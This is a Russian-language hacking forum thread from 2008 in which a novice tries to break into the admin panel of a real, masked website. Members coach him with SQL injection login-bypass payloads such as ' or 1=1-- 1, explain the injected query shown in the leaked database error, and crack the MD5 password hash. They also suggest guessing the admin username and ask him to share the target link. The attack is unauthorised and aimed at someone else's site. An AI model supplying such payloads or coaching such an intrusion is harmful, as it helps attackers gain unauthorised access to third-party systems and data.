Уязвимосьть при авторизации

Tigerrr · 21 Dec 2008

Привет всем.
Вот заинтересовался одним сайтом... быстренько подобрал адрес к админке ****.ru/admin/
(по всей видимости там cms joomla ...еси правильно ...ну или както так)
И передомной несколько полей: лог. , пас., и защитная строка.

В качестве лога ввожу ' or '1'=1' и любой пас...
Мне выдает
Code:
Fatal error: Uncaught exception 'Exception' with message 'SELECT * FROM cms(íàçâàíèå ñàéòà)_admin.users WHERE login='' or '1'=1'' AND pass='b59c67bf196a4758191e42f76670ceba' AND is_deleted=0; ' in /usr/home/sites/*****.com/data/f/db.inc.php:43 Stack trace: #0 /usr/home/sites/********.com/data/f/db.inc.php(149): db::q('SELECT * FROM c...') #1 /usr/home/sites/*********/data/admin/parts/login.php(29): db::qfa('SELECT * FROM c...') #2 /usr/home/sites/********.com/data/admin/index.php(89): require_once('/usr/home/sites...') #3 {main} thrown in /usr/home/sites/********.com/data/f/db.inc.php on line 43
Я как новенький в етом деле незнаю че мне делать дальше... подскажите плз
пасиба заранее

ntldr · 21 Dec 2008

' or '1'=1'/* попробуй

master01 · 21 Dec 2008

Попробуй логин :admin (если не подойдёт, ищи как ник админа на сайте)
Code:
 pass='b59c67bf196a4758191e42f76670ceba'
пасс был зашифрован MD5 : 1111
Возможно попадёшь в админку.

Tigerrr · 21 Dec 2008

Этот пас я вводил когда в логе было ' or '1'=1'

Tigerrr · 21 Dec 2008

При вводе ' or '1'=1'/* почти тоже самое

Code:

Fatal error: Uncaught exception 'Exception' with message 'SELECT * FROM cms*****_admin.users WHERE login='' or '1'=1'/\*' AND pass='698d51a19d8a121ce581499d7b701668' AND is_deleted=0; ' in /usr/home/sites/*****.com/data/f/db.inc.php:43 Stack trace: #0 /usr/home/sites/*****.com/data/f/db.inc.php(149): db::q('SELECT * FROM c...') #1 /usr/home/sites/*****.com/data/admin/parts/login.php(29): db::qfa('SELECT * FROM c...') #2 /usr/home/sites/*****.com/data/admin/index.php(89): require_once('/usr/home/sites...') #3 {main} thrown in /usr/home/sites/*****.com/data/f/db.inc.php on line 43

Tigerrr · 22 Dec 2008

люди, посоветуйте чтото, плиз... я уже незнаю что делать(

Tigger · 22 Dec 2008

Ты у меня ник сер, да))?
master01 вроде как все написал!
А если что то скинь мне Линк в личку.

-m0rgan- · 22 Dec 2008

Может линк выложишь?
Людям так проще будет...

Grey · 22 Dec 2008

1. Для вопросов есть спец тема.
2. А почему ' or '1'=1'?
Попробуй: ' or 1=1 or '1'='1
Тогда запрос будет таким:
Code:
SELECT * FROM cms(íàçâàíèå ñàéòà)_admin.users WHERE login='' or 1=1 or '1'='1' AND pass='b59c67bf196a4758191e42f76670ceba' AND is_deleted=0;
т.е. условие выполнится.
Или попробуй: ' or 1=1-- 1

TAKO · 22 Dec 2008

Это не джумла, определенно, судя по путям:

/usr/home/sites/*****.com/data/f/db.inc.php
Click to expand...

Tigerrr · 22 Dec 2008

Попробуй: ' or 1=1 or '1'='1
Или попробуй: ' or 1=1-- 1
Click to expand...

так не выходит...

Велемир · 22 Dec 2008

Жумла лежит кстати по дефолту в /administrator ...А мамба - в /admin.По крайней мере,я встречал только так.

Уязвимосьть при авторизации

Tigerrr New Member

ntldr Elder - Старейшина

master01 Banned

Tigerrr New Member

Tigerrr New Member

Tigerrr New Member

Tigger Elder - Старейшина

-m0rgan- Elder - Старейшина

Grey Banned

TAKO Banned

Tigerrr New Member

Велемир Banned

Useful Searches

Уязвимосьть при авторизации

Tigerrr New Member

ntldr Elder - Старейшина

master01 Banned

Tigerrr New Member

Tigerrr New Member

Tigerrr New Member

Tigger Elder - Старейшина

-m0rgan- Elder - Старейшина

Grey Banned

TAKO Banned

Tigerrr New Member

Велемир Banned